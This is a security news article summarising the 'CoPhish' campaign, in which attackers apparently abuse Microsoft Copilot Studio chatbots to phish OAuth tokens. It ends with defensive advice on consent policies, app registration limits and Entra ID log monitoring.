Skip to Content

How AI-Powered Phishing Attacks Are Exploiting Copilot Studio: What You Need to Know

AI-Powered Phishing Tactics Redefine the Threat Landscape

Phishing attacks have evolved, now leveraging AI platforms to bypass traditional security measures. A recent campaign, known as CoPhish, illustrates this shift. By weaponizing Microsoft Copilot Studio, attackers create convincing phishing schemes aimed at stealing OAuth tokens and accessing Microsoft Entra ID accounts. This new tactic exploits productivity tools in unexpected ways, making it harder for even experienced users to stay safe.

Inside the CoPhish Attack

Researchers at Datadog Security Labs uncovered how CoPhish operates. Criminals use Copilot Studio’s AI agents to deploy malicious chatbots, which they host on authentic Microsoft domains. This approach disguises classic OAuth consent scams, allowing them to slip past both technical defenses and user suspicion.

  • Malicious Agents: Attackers spin up chatbots using trial licenses and their own or compromised tenants.

  • Backdoored Authentication: Login workflows are altered to send OAuth tokens to the attacker as soon as a user consents.

  • Trusted Domains: Phishing links appear genuine, leveraging Microsoft’s official infrastructure to instill trust.

Step-by-Step: How Victims Are Targeted

When users click a phishing link, they encounter a familiar Copilot Studio interface and a prompt to log in. By authenticating, they inadvertently give the attacker access to key data such as emails or calendars, depending on their account privileges. The OAuth token is then quietly transmitted to the attacker, often via Microsoft IP addresses, making detection even more challenging.

  • Internal Users: The application requests modest permissions, lowering suspicion.

  • Privileged Users: Broader, potentially admin-level permissions may be sought, increasing risk.

With the stolen token, attackers can impersonate users, siphon off sensitive data, or propagate further phishing attempts without alerting victims.

Gaps in Microsoft’s Security Controls

Microsoft has made strides to tighten OAuth consent policies, such as default restrictions and requiring admin approval for risky apps. Yet, vulnerabilities remain:

  • Regular users can still approve certain internal apps for moderate permissions.

  • High-level admin roles have the authority to grant extensive permissions across apps.

  • Recent policy changes help, but do not fully protect privileged accounts from exploitation.

The flexibility of low-code platforms like Copilot Studio, combined with integrated identity features, allows attackers to quickly craft new, evasive phishing agents. This agility outpaces many conventional security defenses, exposing organizations to fresh risks.

Protecting Your Organization Against AI-Driven Phishing

To counter these advanced threats, adopting a layered defense strategy is critical:

  • Enforce Custom Consent Policies: Strengthen controls beyond Microsoft defaults to tightly manage app permissions and approvals.

  • Restrict App Registrations: Limit users' ability to register new OAuth apps unless absolutely necessary.

  • Monitor Entra ID Logs: Actively track for abnormal app consents, Copilot Studio activities, and suspicious logins.

  • Ongoing User Education: Inform both end users and admins about AI-powered phishing and how to recognize risky OAuth consent screens.

Adapting to an Evolving Threat

CoPhish highlights the double-edged nature of AI and low-code solutions in the workplace. While these tools boost productivity, they also expand the attack surface in unforeseen ways. Security teams must adapt quickly, tighten identity controls, and foster a culture of awareness to stay ahead of increasingly sophisticated phishing campaigns. Ultimately, robust policies and continuous vigilance are now indispensable for cloud security.

Source: Cyber Security News

How AI-Powered Phishing Attacks Are Exploiting Copilot Studio: What You Need to Know
Joshua Berkowitz October 27, 2025
Views 143
Share this post